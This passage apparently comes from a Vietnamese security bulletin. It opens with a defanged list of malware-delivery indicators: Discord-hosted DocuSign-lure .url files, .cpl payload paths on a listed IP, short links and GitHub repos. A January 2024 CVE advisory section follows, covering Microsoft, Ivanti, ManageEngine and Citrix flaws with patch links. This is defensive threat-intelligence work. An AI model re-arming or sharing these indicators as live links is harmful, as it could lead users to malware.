hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1170627584627855481/DocuSign1[.]url?ex=6559bae5&is=654745e5&hm=acf93c3a4f79068689d20d197ac297533dc28d94bb93f4ec1021c7c258c8dbda&
file[://]51[.]79[.]185[.]145/pdf/data1[.]zip/pdf1[.]cpl
file[://]51[.]79[.]185[.]145/pdf/data2[.]zip/pdf2[.]cpl
hxxps[://]shorturl[.]at/flEK5
hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1167767477921513512/SecureDocuSign_pdf[.]url?ex=654f5336&is=653cde36&hm=08ea24126262ff865a1ab0c79f20e41e9e53896d9cda8e0c374c077f5a500b00&
file[://]51[.]79[.]185[.]145/pdf/data[.]zip/docusign_pdf[.]cpl
hxxps[://]shorturl[.]at/clpIO
hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1171355007245893653/DocuSignDocument[.]url?ex=655c605c&is=6549eb5c&hm=2aeb65239a890e6b070957136681600ca33584e578816faeab471a5e11004538&
file[://]51[.]79[.]185[.]145/pdf/data3[.]zip/pdf3[.]cpl
hxxps[://]shorturl[.]at/eqxU0
hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1175808264479449138/DocuSign3[.]url?ex=656c93c7&is=655a1ec7&hm=6e8b316f2112cfaf27bc8cf35089098e4a0f2d16054e8d199c13588c31b2e383&
file[://]51[.]79[.]185[.]145/pdf/kay[.]zip/kay[.]cpl
hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1177255994775064717/kay[.]url?ex=6571d815&is=655f6315&hm=5edd3e4b0cc773a06fe9f1a8177f99239a105079f23eb7707c225be4867160df&
hxxps[://]shorturl[.]at/dMY69
hxxps[://]cdn[.]discordapp[.]com/attachments/853270434422456330/1184415259717533726/My_Photo_Album[.]url
hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1177255995156742144/DocuSign4[.]url?ex=6571d815&is=655f6315&hm=f9e208714ffc862f97cb6363fb887f11fda0020802a020a56a571c4195114854&
hxxps[://]shorturl[.]at/ixEZ7
hxxps[://]cdn[.]discordapp[.]com/attachments/853270434422456330/1183676616564547624/image_reported[.]url?ex=658933c1&is=6576bec1&hm=b60477e0a798182a1dc0ea65def7305b111ce06a398667a1c567b3f9afd253b2&
file[://]51[.]79[.]185[.]145/pdf/data2[.]zip/pdf2[.]cpl
hxxps[://]shorturl[.]at/oORV9
file[://]51[.]79[.]185[.]145/pdf/data3[.]zip/pdf3[.]cpl
hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1172211288303206400/DocuSign3[.]url?ex=655f7dd5&is=654d08d5&hm=26a68927b4c05c243d910f3a5ebcf2c6ec43bcb7f460acd45891b3b21b308cdc&
hxxps[://]cdn[.]discordapp[.]com/attachments/853270434422456330/1176802586481922098/image_reported[.]url
hxxps[://]shorturl[.]at/gnL15
hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1170627585680609280/DocuSign3[.]url
hxxps[://]shorturl[.]at/dKOR6
hxxps[://]github[.]com/nateeintanan2527/Joyce_Data[.]git
hxxps[://]github[.]com/nateeintanan2527/Data_Document[.]git
hxxps[://]raw[.]githubusercontent[.]com/nateeintanan2527/Joyce_Data
hxxps[://]raw[.]githubusercontent[.]com/nateeintanan2527/Data_Document
IP
51[.]79[.]185[.]145
3 CVE và các khuyến nghị bảo mật
3.1 Microsoft Patch Tuesday – January 2024
Trong tháng 01, Microsoft đã phát hành các bản vá cho 49 CVE mới trong các sản phẩm của Microsoft Windows và Windows Components; Office và Office Components; Azure; .NET Framework và Visual Studio; SQL Server; Windows Hyper-V; và Internet Explorer. Trong đó có 3 lỗ hổng được đánh giá mức độ Nghiêm trọng, 47 lỗ hổng được đánh giá là Important. Dưới đây là các CVE nổi bật:
3.1.1 CVE-2024-20674– Windows Kerberos Security Feature Bypass Vulnerability
CVSS: 9.0/10
Mô tả: Lỗ hổng cho phép kẻ tấn công không cần xác thực, vượt qua cơ chế bảo mật trong Windows Kerberos bằng cách thiết lập cuộc tấn công như MITM hoặc kỹ thuật giả mạo mạng cục bộ. Sau đó gửi các message Kerberos độc hại đến máy nạn nhân để giả mạo.
Phiên bản ảnh hưởng:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20674
3.1.2 CVE-2024-20700 – Windows Hyper-V Remote Code Execution Vulnerability.
CVSS: 7.5/10
Mô tả: Tồn tại lỗ hổng race-condition, khai thác lỗ hổng thành công cho phép kẻ tấn công thực thi mã từ xa trên hệ thống bị ảnh hưởng. Khai thác lỗ hổng không yêu cầu thông tin xác thực cũng như tương tác người dùng.
Phiên bản ảnh hưởng:
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for x64-based Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20700
3.1.3 CVE-2024-0056 – Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability
CVSS: 8.7/10
Mô tả: Khai thác lỗ hổng thành công cho phép kẻ tấn công thực hiện cuộc tấn công MITM, cho phép giải mã hoặc sửa đổi lưu lượng TLS giữa máy khách và máy chủ.
Phiên bản ảnh hưởng:
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.5 AND 4.8.1
Microsoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2
Microsoft .NET Framework 3.5 AND 4.7.2
Microsoft .NET Framework 3.5 AND 4.8
Microsoft .NET Framework 4.8
Microsoft SQL Server 2022 for x64-based Systems (CU 10)
Microsoft Visual Studio 2022 version 17.8
Microsoft Visual Studio 2022 version 17.6
Microsoft Visual Studio 2022 version 17.4
Microsoft Visual Studio 2022 version 17.2
System.Data.SqlClient
Microsoft.Data.SqlClient 5.1
Microsoft.Data.SqlClient 4.0
Microsoft.Data.SqlClient 3.1
Microsoft.Data.SqlClient 2.1
.NET 8.0
.NET 7.0
.NET 6.0
Microsoft SQL Server 2022 for x64-based Systems (GDR)
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-0056
3.2 Ứng Dụng Web Và Các Sản Phẩm Khác
3.2.1 CVE-2023-46805 – Authentication Bypass Vulnerability
CVSS: 8.2/10
Mô tả: Tồn tại lỗ hổng vượt qua xác thực trong web component của Ivanti ICS 9x, 22.x và Ivanti Policy Secure cho phép kẻ tấn công truy cập vào các tài nguyên quan trọng của hệ thống.
Phiên bản ảnh hưởng:
Ivanti Connect Secure
Ivanti Policy Secure Gateways
Khuyến nghị: Thực hiện rà soát các máy chủ bị ảnh hưởng lên kế hoạch thực hiện các giảm thiểu và các bản cập nhât đã phát hành theo hướng dẫn của hãng:
https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
3.2.2 CVE-2024-21887– Command Injection Vulnerability
CVSS: 9.1/10
Mô tả: Tồn tại lỗ hổng command injection trong web component của Ivanti ICS 9x, 22.x và Ivanti Policy Secure cho phép kẻ tấn công thực thi các lệnh tùy ý trên hệ thống bị ảnh hưởng.
Phiên bản ảnh hưởng:
Ivanti Connect Secure
Ivanti Policy Secure Gateways
Khuyến nghị: Thực hiện rà soát các máy chủ bị ảnh hưởng lên kế hoạch thực hiện các giảm thiểu và các bản cập nhât đã phát hành theo hướng dẫn của hãng:
https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
3.2.3 CVE-2023-47211 – ManageEngine OpManager uploadMib Path Traversal Vulnerability
CVSS: 9.1/10
Mô tả: Tồn tại lỗ hổng Path Traversal trong tính năng UploadMib của ManaEngine OpManager cho phép kẻ tấn công tạo file tùy ý bằng cách tải lên tệp tin MiB độc hại.
Phiên bản ảnh hưởng:
OpManager
OpManager Plus
OpManager MSP
Network Configuration Manager
NetFlow Analyzer
Firewall Analyzer
OpUtils.
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://www.manageengine.com/itom/advisory/cve-2023-47211.html
3.2.4 CVE-2023-6548 – Citrix NetScaler ADC and Gateway Authenticated Remote Code Execution (RCE) Vulnerability.
CVSS: 5.5/10
Mô tả: Tồn tại lỗ hổng Code Injection trong NetScaler ADC và NetScaler Gateway cho phép kẻ tấn công có quyền truy cập tới tới giao diện quản trị của NetScaler IP (NSIP), Subnet IP (SNIP) hoặc CLIP (Cluster management IP), từ đó thực thi mã từ xa với đặc quyền thấp. Lỗ hổng được hãng ghi nhân đang được sử dụng bởi các nhóm tấn công
Phiên bản ảnh hưởng:
NetScaler ADC và NetScaler Gateway 14.1 trước phiên bản 14.1-12.35
NetScaler ADC và NetScaler Gateway 13.1 trước phiên bản 13.1-51.15
NetScaler ADC và NetScaler Gateway 13.0 trước phiên bản 13.0-92.21
NetScaler ADC 13.1-FIPS trước phiên bản 13.1-37.176
NetScaler ADC 12.1-FIPS trước phiên bản 12.1-55.302
NetScaler ADC 12.1-NDcPP trước phiên bản 12.1-55.302OpManager MSP
Lưu ý: NetScaler ADC and NetScaler Gateway phiên bản 12.1 hiện tại không còn được hỗ trợ từ hãng, do đó cũng tồn tại lỗ hổng
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549
3.2.5 CVE- 2023-6549 – Citrix NetScaler ADC and Gateway Denial of Service Vulnerability.
CVSS: 8.2/10
Mô tả: Tồn tại lỗ hổng Bounds of a Memory Buffer trong NetScaler ADC và NetScaler Gateway cho phép kẻ tấn công thực hiện tấn công từ chối dịch vụ (DoS). Khai thác lỗ hổng yêu cầu các ứng dung cấu hình như là một Gateway (ví du như VPN, ICA Proxy, CVPN, RDP Proxy) hoặc AAA virtual server). Lỗ hổng được hãng ghi nhân đang được sử dụng bởi các nhóm tấn công.
Phiên bản ảnh hưởng:
NetScaler ADC và NetScaler Gateway 14.1 trước phiên bản 14.1-12.35
NetScaler ADC và NetScaler Gateway 13.1 trước phiên bản 13.1-51.15
NetScaler ADC và NetScaler Gateway 13.0 trước phiên bản 13.0-92.21
NetScaler ADC 13.1-FIPS trước phiên bản 13.1-37.176
NetScaler ADC 12.1-FIPS trước phiên bản 12.1-55.302
NetScaler ADC 12.1-NDcPP trước phiên bản 12.1-55.302
Lưu ý: NetScaler ADC and NetScaler Gateway phiên bản 12.1 hiện tại không còn được hỗ trợ từ hãng, do đó cũng tồn tại lỗ hổng
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549